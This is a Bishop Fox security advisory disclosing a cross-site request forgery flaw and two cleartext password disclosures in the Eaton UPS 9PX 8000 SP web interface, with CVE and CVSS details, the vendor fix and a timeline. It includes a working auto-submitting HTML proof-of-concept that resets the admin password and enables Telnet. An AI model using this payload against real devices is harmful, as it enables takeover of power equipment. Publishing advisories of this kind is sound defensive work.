Tune into our first episode of Tool Talk: a how-to series for hackers. REGISTER ›

Eaton UPS 9PX 8000 SP - Multiple Vulnerabilities

Bishop Fox high risk vulnerabilities security advisory

Share

Eaton Advisory Summary

Product Description

The Eaton power management appliance is manufactured by Eaton Corporation. This equipment uses a web interface to allow administrators to configure it. This web interface is where the vulnerabilities were discovered.

Affected Versions

UPS 9PX 8000 SP

Vulnerabilities List

Multiple high-risk vulnerabilities were identified within the EATON UPS 9PX 8000 SP web application:

  • One instance of cross-site request forgery
  • Two instances of password disclosure

These vulnerabilities are described in the following sections.

Solution

Eaton Corporation closed out the foregoing vulnerabilities by developing and validating firmware that addresses the noted risks.  The fix can be found at the following website: https://powerquality.eaton.com/support/software-drivers/downloads/connectivity-firmware.asp

Cross-site Request Forgery

The Eaton web application is affected by one cross-site request forgery (CSRF) vulnerability. This CSRF bug requires user interaction to be executed.

Vulnerability Details

CVE ID: CVE-2018-9281

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-352

CVSS Base Score: 8.8

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

The administration panel is vulnerable to CSRF attacks in the change password functionality. The vulnerability could be used to force a logged-in administrator to perform a silent password update.

This issue can be triggered by redirecting an administrator who is logged into the Eaton application to a malicious web page.

The code snippet below can be used to exploit this vulnerability:

<head>

<title>CSRF Eaton</title>

</head>

<body>


<iframe style="display:none" name="csrf-frame"></iframe>

<form id="csrf-form" action="http://HOST/Forms/ups_cont_1" method="POST" target="csrf-frame" >

<input type="hidden" name="ManagerLogin" value="admin" >

<input type="hidden" name="NewPassword" value="MyPassword" >

<input type="hidden" name="ConfirmPassword" value="MyPassword" >

<input type="hidden" name="AuthExternal" value="1" >

<input type="hidden" name="SecurityMode" value="1" >

<input type="hidden" name="TelnetAccess" value="on" >

<input type="hidden" name="ConsoleInterface" value="1" >

<input type="hidden" name="Submit" value=" Save " >

</form>

<script>document.getElementById("csrf-form").submit()</script>


<iframe style="display:none" name="csrf-frame2"></iframe>

</body>
</head>

Password Disclosure

The Eaton web application is affected by a password disclosure vulnerability. The Eaton appliance discloses user passwords in two ways, which are described below. To exploit the vulnerability, a malicious user needs to be authenticated to the web application and browse to the affected pages.

Vulnerability Details

CVE ID: CVE-2018-9281 and CVE-2018-9280

Access Vector: Remote

Security Risk: Medium

Vulnerability: CWE-200

CVSS Base Score: 4.9

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

User Password Disclosure (CVE-2018-9279)

The web page displayed by the appliance stores user passwords in cleartext. Passwords could be retrieved by browsing the source code of the web page, as shown in the figure below:

BishopFox-Advisory-Eaton1


SNMP version 3 Password Disclosure (CVE-2018-9280)

The Eaton appliance discloses the SNMP version 3 user's password as well. The web page displayed by the appliance contains the password in cleartext.

Passwords of read/write users could be retrieved by browsing the source code of the web page, as shown in the figure below:

Passwords of read/write users could be retrieved by browsing the source code of the web page.

Disclosure Timeline: 

  • 3/1/2018: Initial discovery
  • 7/2/2018: Contact with vendor
  • 10/15/2018: Solution released by vendor
  • 10/19/2018: Public disclosure of vulnerabilities 

Researchers:


Kelly albrink

About the author, Kelly Albrink

Application Security Practice Director

Kelly Albrink (CCNA CyberOps, GCIH, GSEC, OSCP, GWAPT, Sec+) is the Application Security Practice Director at Bishop Fox. In this role, she focuses on application security, red teaming, network penetration testing, and hardware security.

Kelly has presented at a number of Bay Area events including Okta's inaugural security conference, Okta Rex, Day of Shecurity, and the DeadDrop San Francisco Meetup. She is a recipient of the SANS CyberTalent Immersion Academy scholarship, and is an active CTF participant. Kelly has competed in the NetWars Tournament of Champions, a national invite-only competition that admits only those who have placed highly in regional CTFs. In addition, she volunteers with her local hackerspace, Noisebridge, where she organizes Infosec Lab Nights and mentors aspiring penetration testers.

More by Kelly

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.